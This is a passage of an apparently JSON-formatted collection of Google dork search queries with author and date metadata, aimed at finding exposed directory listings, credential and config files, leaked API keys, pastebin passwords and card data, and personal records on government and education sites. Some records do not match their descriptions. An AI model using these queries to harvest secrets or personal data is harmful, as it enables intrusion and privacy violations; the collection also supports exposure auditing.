"description": "# Google Dork: intext:\"index of\" \"home_page\"\r\n# Files Containing Juicy Info\r\n# Date:6/11/2021\r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "inurl:/mutillidae/ \"Toggle Hints\"", "description": "# Google Dork: inurl:/mutillidae/ \"Toggle Hints\"\r\n# Files Containing Juicy Info\r\n# Date:6/11/2021\r\n# Exploit Author: Kin Wong"}, {"dork": "intext:\"index of\" inurl:/etc/", "description": "# Google Dork: intext:\"index of\" inurl:/etc/\r\n# Files Containing Juicy Info\r\n# Date:7/11/2021\r\n# Exploit Author: Sandesh Ajgekar"}, {"dork": "inurl:wp-content/uploads/wooccm_uploads", "description": "# Google Dork: inurl:wp-content/uploads/wooccm_uploads\r\n# Files Containing Juicy Info\r\n# Date:7/11/2021\r\n# Exploit Author: Stuart Steenberg"}, {"dork": "intitle:\"index of\" \"particle.js\"", "description": "# Google Dork: intitle:\"index of\" \"particle.js\"\r\n# Files Containing Juicy Info\r\n# Date:7/11/2021\r\n# Exploit Author: Priyanshu Choudhary"}, {"dork": "index of: \"invoice\" \"upload\"", "description": "# Google Dork: index of: \"invoice\" \"upload\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Raghavaraju Lohitha"}, {"dork": "intitle:\"index of\" Hindi movies", "description": "# Google Dork: intitle:\"index of\" Hindi movies\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intext:\"index of\" \"wp-uploads\"", "description": "# Google Dork: intext:\"index of\" \"wp-uploads\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intext:\"index of\" \"signin\"", "description": "# Google Dork: intext:\"index of\" \"signin\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "index of: \"marksheet\" \"upload\"", "description": "# Google Dork: index of: \"marksheet\" \"upload\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "inurl:gov.uk", "description": "# Google Dork: inurl:gov.uk\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intext:\"Index of\" intext:\"users.zip\"", "description": "# Google Dork: intext:\"Index of\" intext:\"users.zip\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Parshwa Bhavsar"}, {"dork": "intext:\"Index of\" \"services.php | pass.php | passwd.php | credentials.txt\"", "description": "# Google Dork: intext:\"Index of\" \"services.php | pass.php | passwd.php | credentials.txt\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Parshwa Bhavsar"}, {"dork": "intitle:\"index of\" \"dhcp\"", "description": "# Google Dork: intitle:\"index of\" \"dhcp\"\r\n# Files Containing Juicy Info\r\n# Date:6/11/2021\r\n# Exploit Author: Veeresh Appasaheb Patil"}, {"dork": "index of:\"blog\" \"upload\"", "description": "# Google Dork: index of:\"blog\" \"upload\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "inurl:cache/uploads", "description": "# Google Dork: inurl:cache/uploads\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Onkar Deshmukh"}, {"dork": "intitle:\"index of\" \"Apache/2.4.41 (Ubuntu) Server\"", "description": "# Google Dork: intitle:\"index of\" \"Apache/2.4.41 (Ubuntu) Server\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Chinmay Divekar"}, {"dork": "{intitle: indexof/.git }", "description": "# Google Dork: {intitle: indexof/.git }\r\n# Files Containing Juicy Info\r\n# Date: 9/11/2021 \r\n# Exploit Author: Aadesh deep namdev"}, {"dork": "site:gov.hk intitle:index of /", "description": "# Google Dork: site:gov.hk intitle:index of /\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Nithissh S"}, {"dork": "inurl:pastebin \"AWS_ACCESS_KEY\"", "description": "# Google Dork: inurl:pastebin \"AWS_ACCESS_KEY\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Nithissh S"}, {"dork": "site:*/forgotpassword.php", "description": "# Google Dork: site:*/forgotpassword.php\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Anirudh Kumar Kushwaha"}, {"dork": "site:.edu intitle:\"index of\"", "description": "# Google Dork: site:.edu intitle:\"index of\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Anirudh Kumar Kushwaha"}, {"dork": "site:pastebin.com \"*@gmail.com password\"", "description": "# Google Dork: site:pastebin.com \"*@gmail.com password\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Anirudh Kumar Kushwaha"}, {"dork": "site:.edu inurl:search", "description": "# Google Dork: site:.edu inurl:search\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Anirudh Kumar Kushwaha"}, {"dork": "intitle:\"Index of\" \"DCIM/camera\"", "description": "# Google Dork: intitle:\"Index of\" \"DCIM/camera\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"Index of\" \"Screenshot\"", "description": "# Google Dork: intitle:\"Index of\" \"Screenshot\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"Index of\" \"system32\"", "description": "# Google Dork: intitle:\"Index of\" \"system32\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"Index of\" \"Program files\"", "description": "# Google Dork: intitle:\"Index of\" \"Program files\"\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"Index of\" *.py", "description": "# Google Dork: intitle:\"Index of\" *.py\r\n# Files Containing Juicy Info\r\n# Date:8/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"index of\" \"certificates\"", "description": "# Google Dork: intitle:\"index of\" \"certificates\"\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Chinmay Divekar"}, {"dork": "intitle:\"index of\" \"/.cpanel\"", "description": "# Google Dork: intitle:\"index of\" \"/.cpanel\"\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: chinmay Divekar"}, {"dork": "\"index of\" :excel documents", "description": "# Google Dork: \"index of\" :excel documents\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Renuka Kharat"}, {"dork": "intitle:\"index of\" :mobile number", "description": "# Google Dork: intitle:\"index of\" :mobile number\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Renuka Kharat"}, {"dork": "intitle:\"index of\" \"node.js\"", "description": "# Google Dork: intitle:\"index of\" \"node.js\"\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Priyanshu Choudhary"}, {"dork": "intext:\"Index of\" intext:\"config.zip\"", "description": "# Google Dork: intext:\"Index of\" intext:\"config.zip\"\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Parth Surati"}, {"dork": "inurl: conf/fastcgi.conf", "description": "# Google Dork: inurl: conf/fastcgi.conf\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Nithissh S"}, {"dork": "inurl:conf/nginx.conf", "description": "# Google Dork: inurl:conf/nginx.conf\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Nithissh S"}, {"dork": "site:com intitle:\"index of\" .env", "description": "# Google Dork: site:com intitle:\"index of\" .env\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Suvendu Dash"}, {"dork": "intitle:\"Index of\" *.xlsx", "description": "# Google Dork: intitle:\"Index of\" *.xlsx\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "inurl:pastebin \"SHODAN_API_KEY\"", "description": "# Google Dork:inurl:pastebin \"SHODAN_API_KEY\"\r\n# Files Containing Juicy Info\r\n# Date: 09/11/2021 \r\n# Exploit Author: Nithissh S"}, {"dork": "inurl:*gov intitle:\"index of/documents\"", "description": "# Google Dork: inurl:*gov intitle:\"index of/documents\"\r\n# Files Containing Juicy Info\r\n# Date: 09/11/2021 \r\n# Exploit Author: Resham Kumar Chaudhary"}, {"dork": "inurl:.php?=*php site:.nic.in", "description": "# Google Dork: inurl:.php?=*php site:.nic.in\r\n# Files Containing Juicy Info\r\n# Date: 09/11/2021\r\n# Exploit Author: Sagar Jana"}, {"dork": "intitle:\"index of\" \"/students\"", "description": "# Google Dork: intitle:\"index of\" \"/students\"\r\n# Files Containing Juicy Info\r\n# Date: 09/11/2021 \r\n# Exploit Author: Priyanshu Choudhary"}, {"dork": "site:com \"rfp\" filetype:pdf", "description": "# Google Dork: site:com \"rfp\" filetype:pdf\r\n# Files Containing Juicy Info\r\n# Date: 10/11/2021 \r\n# Exploit Author: Satish Kumar Singh"}, {"dork": "site:.edu intext:\"index of\" \"logs\"", "description": "# Google Dork: site:.edu intext:\"index of\" \"logs\"\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Anirudh Kumar Kushwaha"}, {"dork": "intext:\"Index of /chatlogs\"", "description": "# Google Dork: intext:\"Index of /chatlogs\"\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Kashish rohilla"}, {"dork": "inurl:pastebin \"CVV\"", "description": "# Google Dork: inurl:pastebin \"CVV\"\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Ritika Keni"}, {"dork": "site: com intext \" organisation data\" filetype:xls", "description": "# Google Dork: site: com intext \" organisation data\" filetype:xls\r\n# Files Containing Juicy Info\r\n# Date: 10/11/2021 \r\n# Exploit Author: Sonali Bhutad"}, {"dork": "intitle:\"index of\" \"default.asp \"", "description": "# Google Dork: intitle:\"index of\" \"default.asp \"\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" fileadmin \"", "description": "# Google Dork: intitle:\"index of\" \" fileadmin \"\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" YaBB.pl \"", "description": "# Google Dork: intitle:\"index of\" \" YaBB.pl \"\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" htsearch \"", "description": "# Google Dork: intitle:\"index of\" \" htsearch \"\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" glimpse \"", "description": "# Google Dork: intitle:\"index of\" \" glimpse \"\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" webdriver \"", "description": "# Google Dork: intitle:\"index of\" \" webdriver \"\r\n# Files Containing Juicy Info\r\n# Date:9/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" index.php.bak \"", "description": "# Google Dork: intitle:\"index of\" \" index.php.bak \"\r\n# Files Containing Juicy Info\r\n# Date:09/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" sendmail.inc \"", "description": "# Google Dork: intitle:\"index of\" \" sendmail.inc \"\r\n# Files Containing Juicy Info\r\n# Date:09/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" login.jsp \"", "description": "# Google Dork: intitle:\"index of\" \" login.jsp \"\r\n# Files Containing Juicy Info\r\n# Date:09/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \" mod_auth_mysql \"", "description": "# Google Dork: intitle:\"index of\" \" mod_auth_mysql \"\r\n# Files Containing Juicy Info\r\n# Date:09/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"test.bat \"", "description": "# Google Dork: intitle:\"index of\" \"test.bat \"\r\n# Files Containing Juicy Info\r\n# Date:09/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"msadcs.dll \"", "description": "# Google Dork: intitle:\"index of\" \"msadcs.dll \"\r\n# Files Containing Juicy Info\r\n# Date:09/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"browser.inc \"", "description": "# Google Dork: intitle:\"index of\" \"browser.inc \"\r\n# Files Containing Juicy Info\r\n# Date:09/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"hello.bat \"", "description": "# Google Dork: intitle:\"index of\" \"hello.bat \"\r\n# Files Containing Juicy Info\r\n# Date:09/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"dvwssr.dll \"", "description": "# Google Dork: intitle:\"index of\" \"dvwssr.dll \"\r\n# Files Containing Juicy Info\r\n# Date:09/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" Servlet\"", "description": "# Google Dork: intitle:\"index of\" Servlet\"\r\n# Files Containing Juicy Info\r\n# Date:09/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" upload.asp \"", "description": "# Google Dork: intitle:\"index of\" upload.asp \"\r\n# Files Containing Juicy Info\r\n# Date:09/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "inurl:pastebin \"API_KEY\"", "description": "# Google Dork: inurl:pastebin \"API_KEY\"\r\n# Files Containing Juicy Info\r\n# Date:10/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "inurl:pastebin \"Windows 10 Product Keys*\"", "description": "# Google Dork: inurl:pastebin \"Windows 10 Product Keys*\"\r\n# Files Containing Juicy Info\r\n# Date:10/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"index of\" \"data*\"", "description": "# Google Dork: intitle:\"index of\" \"data*\"\r\n# Files Containing Juicy Info\r\n# Date:10/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"index of\" \"document*.pdf\"", "description": "# Google Dork: intitle:\"index of\" \"document*.pdf\"\r\n# Files Containing Juicy Info\r\n# Date:10/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "inurl:linkedin.com \"view my resume\" facebook", "description": "# Google Dork: inurl:linkedin.com \"view my resume\" facebook\r\n# Files Containing Juicy Info\r\n# Date: 10/11/2021 \r\n# Exploit Author: Smita Dhanokar"}, {"dork": "intitle.index of .log", "description": "# Google Dork: intitle.index of .log\r\n# Files Containing Juicy Info\r\n# Date: 10/11/2021\r\n# Exploit Author: Arzan Batliwala"}, {"dork": "intitle:\"index of\" \"sysinfo\"", "description": "# Google Dork:intitle:\"index of\" \"sysinfo\"\r\n# Files Containing Juicy Info\r\n# Date: 11/11/2021\r\n# Exploit Author: Hognaglo komi Sergio"}, {"dork": "intitle.index of .exe", "description": "# Google Dork: intitle.index of .exe\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle.index of API*.txt", "description": "# Google Dork: intitle.index of API*.txt\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"index of\" site:gov.np", "description": "# Google Dork: intitle:\u201cindex of\u201d site:gov.np\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"index of\" \"*.mp4\"", "description": "# Google Dork: intitle:\"index of\" \"*.mp4\"\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"index of\" \"admin*.txt\"", "description": "# Google Dork: intitle:\"index of\" \"admin*.txt\"\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "site:.nic.in inurl:.php?id=", "description": "# Google Dork: site:.nic.in inurl:.php?id=\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "inurl:.org intitle index.of \"inflation\"", "description": "# Google Dork: inurl:.org intitle index.of \"inflation\"\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Hardik Jain"}, {"dork": "site:*/admin-portal/", "description": "# Google Dork: site:*/admin-portal/\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Hognaglo komi Sergio"}, {"dork": "intitle:\"index of\" site:gov.ru", "description": "# Google Dork: intitle:\"index of\" site:gov.ru\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"index of\" site:gov.gr", "description": "# Google Dork: intitle:\"index of\" site:gov.gr\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "site:.in | .com | .net intitle:\"index of\" ftp", "description": "# Google Dork: site:.in | .com | .net intitle:\"index of\" ftp\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "inurl:forgotpassword.php", "description": "# Google Dork: inurl:forgotpassword.php\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"index of\" site:gov.*", "description": "# Google Dork: intitle:\"index of\" site:gov.*\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: reza abasi"}, {"dork": "intitle:\"index of\" \"/public_html\"", "description": "# Google Dork: intitle:\"index of\" \"/public_html\"\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Priyanshu Choudhary"}, {"dork": "inurl:node_modules/ua-parser-js", "description": "# Google Dork: inurl:node_modules/ua-parser-js\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Javier Bernardo"}, {"dork": "intitle:\"index of\" \"/public/js\"", "description": "# Google Dork: intitle:\"index of\" \"/public/js\"\r\n# Files Containing Juicy Info\r\n# Date:11/11/2021\r\n# Exploit Author: Priyanshu Choudhary"}, {"dork": "site:drive.google.com \"*.pdf\"", "description": "# Google Dork: site:drive.google.com \"*.pdf\"\r\n# Files Containing Juicy Info\r\n# Date:12/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"index of \"/key/\" \"key.txt\"", "description": "# Google Dork: intitle:\"index of \"/key/\" \"key.txt\"\r\n# Files Containing Juicy Info\r\n# Date:12/11/2021\r\n# Exploit Author: Reza Abasi"}, {"dork": "intitle:\"index of\" \"/products\"", "description": "# Google Dork: intitle:\"index of\" \"/products\"\r\n# Files Containing Juicy Info\r\n# Date: 12/11/2021 \r\n# Exploit Author: Priyanshu Choudhary"}, {"dork": "intitle:\"index of\" \"/mysql\"", "description": "# Google Dork: intitle:\"index of\" \"/mysql\"\r\n# Files Containing Juicy Info\r\n# Date:12/11/2021\r\n# Exploit Author: Priyanshu Choudhary"}, {"dork": "site:*.ng intitle:index of", "description": "# Google Dork: site:*.ng intitle:index of\r\n# Files Containing Juicy Info\r\n# Date:13/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "site:*.edu.in intitle:index of", "description": "# Google Dork: site:*.edu.in intitle:index of\r\n# Files Containing Juicy Info\r\n# Date:13/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "inurl:*gov intitle:\"index of\" \"docker-compose\"", "description": "# Google Dork: inurl:*gov intitle:\"index of\" \"docker-compose\"\r\n# Files Containing Juicy Info\r\n# Date:13/11/2021\r\n# Exploit Author: Vrushabh Kadam"}, {"dork": "inurl:pastebin \"SHODAN_API_KEY\"", "description": "# Google Dork: inurl:pastebin \"SHODAN_API_KEY\"\r\n# Files Containing Juicy Info\r\n# Date:13/11/2021\r\n# Exploit Author: Vrushabh Kadam"}, {"dork": "inurl:*gov intitle:\"index of/documents\"", "description": "# Google Dork: inurl:*gov intitle:\"index of/documents\"\r\n# Files Containing Juicy Info\r\n# Date:13/11/2021\r\n# Exploit Author: Vrushabh Kadam"}, {"dork": "intitle\"index of\" \"php\"", "description": "# Google Dork: intitle\"index of\" \"php\"\r\n# Files Containing Juicy Info\r\n# Date:14/11/2021\r\n# Exploit Author: Sabyasachi Paul"}, {"dork": "intitle:\"index of\" site:gov.in", "description": "# Google Dork: intitle:\"index of\" site:gov.in\r\n# Files Containing Juicy Info\r\n# Date:14/11/2021\r\n# Exploit Author: Arindam Saha"}, {"dork": "site:*.github.io intext:cheatsheet+offensive+pentesting", "description": "# Google Dork: site:*.github.io intext:cheatsheet+offensive+pentesting\r\n# Files Containing Juicy Info\r\n# Date:14/11/2021\r\n# Exploit Author: Dharmendra Yadav"}, {"dork": "intitle:\"index of\" \"admin.js\"", "description": "# Google Dork: intitle:\"index of\" \"admin.js\"\r\n# Files Containing Juicy Info\r\n# Date:14/11/2021\r\n# Exploit Author: Sabyasachi Paul"}, {"dork": "inurl:gov.in & inurl:admin", "description": "# Google Dork: inurl:gov.in & inurl:admin\r\n# Files Containing Juicy Info\r\n# Date:15/11/2021\r\n# Exploit Author: Amit Adhikari"}, {"dork": "intitle:\"index of\" \"wp-inc\"", "description": "# Google Dork: intitle:\"index of\" \"wp-inc\"\r\n# Files Containing Juicy Info\r\n# Date:15/11/2021\r\n# Exploit Author: Chirag Prajapati"}, {"dork": "allintext\"account number\"", "description": "# Google Dork: allintext\"account number\"\r\n# Files Containing Juicy Info\r\n# Date:15/11/2021\r\n# Exploit Author: Smita Dhanokar"}, {"dork": "site:.edu intext:\"index of\" \"payroll\"", "description": "# Google Dork: site:.edu intext:\"index of\" \"payroll\"\r\n# Files Containing Juicy Info\r\n# Date:15/11/2021\r\n# Exploit Author: Anirudh Kumar Kushwaha"}, {"dork": "intitle:\"index of\" \"*.yaml\"", "description": "# Google Dork: intitle:\"index of\" \"*.yaml\"\r\n# Files Containing Juicy Info\r\n# Date:15/11/2021\r\n# Exploit Author: Priyanshu Choudhary"}, {"dork": "site:*.se intitle:\"index of\"", "description": "# Google Dork: site:*.se intitle:\"index of\"\r\n# Files Containing Juicy Info\r\n# Date:15/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "site:*.id intitle:\"index of\" \"screenshot*.jpg\"", "description": "# Google Dork: site:*.id intitle:\"index of\" \"screenshot*.jpg\"\r\n# Files Containing Juicy Info\r\n# Date:15/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"index of\" \"*.vcf\"", "description": "# Google Dork: intitle:\"index of\" \"*.vcf\"\r\n# Files Containing Juicy Info\r\n# Date:15/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intitle:\"index of\" \"apache.log\" | \"apache.logs\"", "description": "# Google Dork: intitle:\"index of\" \"apache.log\" | \"apache.logs\"\r\n# Files Containing Juicy Info\r\n# Date:15/11/2021\r\n# Exploit Author: Pauras Patil"}, {"dork": "inurl:admin filetype:txt", "description": "# Google Dork: inurl:admin filetype:txt\r\n# Files Containing Juicy Info\r\n# Date: 16/11/2021 \r\n# Exploit Author: Saumyajeet Das"}, {"dork": "inurl:admin filetype:xls site:gov.in", "description": "# Google Dork: inurl:admin filetype:xls site:gov.in\r\n# Files Containing Juicy Info\r\n# Date: 17/11/2021 \r\n# Exploit Author: Saumyajeet Das"}, {"dork": "site:pastebin.com intitle:\"cpanel\"", "description": "# Google Dork: intitle:\"R WebServer\"\r\n# Files Containing Juicy Info\r\n# Date: 17/11/2021 \r\n# Exploit Author: Ishani Dhar"}, {"dork": "intitle:index of settings.py", "description": "# Google Dork: intitle:index of settings.py\r\n# Pages Containing Login Portals\r\n# Date: 18/11/2021 \r\n# Exploit Author: Amit Adhikari"}, {"dork": "site:postman.com + keyword", "description": "# Google Dork: site:postman.com + keyword\r\n# Description: This dork returns public postman API collections\r\n# Files Containing Juicy Info\r\n# Date: 17/11/2021 \r\n# Exploit Author: Gabriel Tarsia"}, {"dork": "inurl:admin filetype:xlsx site:gov.*", "description": "# Google Dork: inurl:admin filetype:xlsx site:gov.*\r\n# Files Containing Juicy Info\r\n# Date: 17/11/2021 \r\n# Exploit Author: Krishna Agarwal"}, {"dork": "db_password filetype:env", "description": "# Google Dork: db_password filetype:env\r\n# Files Containing Juicy Info\r\n# Date:18/11/2021\r\n# Exploit Author: Thiru kumaran"}, {"dork": "inurl: /wp-content/uploads/ inurl:\"robots.txt\" \"Disallow:\" filetype:txt", "description": "# Google Dork: inurl: /wp-content/uploads/ inurl:\"robots.txt\" \"Disallow:\" filetype:txt\r\n# Files Containing Juicy Info\r\n# Date:18/11/2021\r\n# Exploit Author: Ritwick Dadhich"}, {"dork": "inurl:admin filetype:xls", "description": "# Google Dork: inurl:admin filetype:xls\r\n# Files Containing Juicy Info\r\n# Date:18/11/2021\r\n# Exploit Author: Ritwick Dadhich"}, {"dork": "site:gov.* intitle:\"index of\" *.apk", "description": "# Google Dork: site:gov.* intitle:\"index of\" *.apk\r\n# Files Containing Juicy Info\r\n# Date:17/11/2021\r\n# Exploit Author: Krishna Agarwal"}, {"dork": "site:gov.* intitle:\"index of\" *.csv", "description": "# Google Dork: site:gov.* intitle:\"index of\" *.csv\r\n# Files Containing Juicy Info\r\n# Date: 18/11/2021\r\n# Exploit Author: Midhun Mohanan"}, {"dork": "Fwd: intitle:\"Index of /\" intext:\"resource/\"", "description": "# Google Dork: Fwd: intitle:\"Index of /\" intext:\"resource/\"\r\n# Files Containing Juicy Info\r\n# Date:18/11/2021\r\n# Exploit Author: Mugdha Bansode"}, {"dork": "Google to wordpress", "description": "# Google Dork: intitle:\"index of\" \"wp-config.php.bak\"\r\n# Files Containing Juicy Info\r\n# Date:18/11/2021\r\n# Exploit Author: Aitor Herrero"}, {"dork": "Fwd: intitle:\"atvise - next generation\"", "description": "# Google Dork: Fwd: intitle:\"atvise - next generation\"\r\n# Files Containing Juicy Info\r\n# Date:19/11/2021\r\n# Exploit Author: Mugdha Bansode"}, {"dork": "site:papaly.com + keyword", "description": "# Google Dork: site:papaly.com + keyword\r\n# Files Containing Juicy Info\r\n# Date:18/11/2021\r\n# Exploit Author: Gabriel Tarsia"}, {"dork": "intitle:\"Apache Flink Web Dashboard\"", "description": "# Google Dork: intitle:\"Apache Flink Web Dashboard\"\r\n# Files Containing Juicy Info\r\n# Date:14/06/2022\r\n# Exploit Author: Alfie"}, {"dork": "intitle:\"Index of cd\"", "description": "# Google Dork: intitle:\"index of\" \"man.sh\"\r\n# Files Containing Juicy Info\r\n# Date:14/06/2022\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"files.pl\"", "description": "# Google Dork: intitle:\"index of\" \"files.pl\"\r\n# Files Containing Juicy Info\r\n# Date:14/06/2022\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"man.sh\"", "description": "# Google Dork: intitle:\"index of\" \"man.sh\"\r\n# Files Containing Juicy Info\r\n# Date:14/06/2022\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "allintitle:index of \"/icewarp\"", "description": "# Google Dork: allintitle:index of \"/icewarp\"\r\n# Files Containing Juicy Info\r\n# Date:14/06/2022\r\n# Exploit Author: AFFAN AHMED"}, {"dork": "allintitle:index of \"/microweber\"", "description": "# Google Dork: allintitle:index of \"/microweber\"\r\n# Files Containing Juicy Info\r\n# Date:14/06/2022\r\n# Exploit Author: AFFAN AHMED"}, {"dork": "site:gov.* intitle:\"index of\" *Dokuments\"", "description": "# Google Dork: site:gov.* intitle:\"index of\" *Dokuments\"\r\n# Files Containing Juicy Info\r\n# Date:14/06/2022\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "site:gov.* intitle:\"index of\" *.css", "description": "# Google Dork: site:gov.* intitle:\"index of\" *.css\r\n# Files Containing Juicy Info\r\n# Date:14/06/2022\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" google-api-php-client", "description": "# Google Dork: intitle:\"index of\" google-api-php-client\r\n# Files Containing Juicy Info\r\n# Date:02/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" twitter-api-php", "description": "# Google Dork: intitle:\"index of\" twitter-api-php\r\n# Files Containing Juicy Info\r\n# Date: 02/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" sns-login", "description": "# Google Dork: intitle:\"index of\" sns-login\r\n# Files Containing Juicy Info\r\n# Date:02/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" linkedin-api", "description": "# Google Dork: intitle:\"index of\" linkedin-api\r\n# Files Containing Juicy Info\r\n# Date:02/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" facebook-api", "description": "# Google Dork: intitle:\"index of\" facebook-api\r\n# Files Containing Juicy Info\r\n# Date: 02/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" instagram-api", 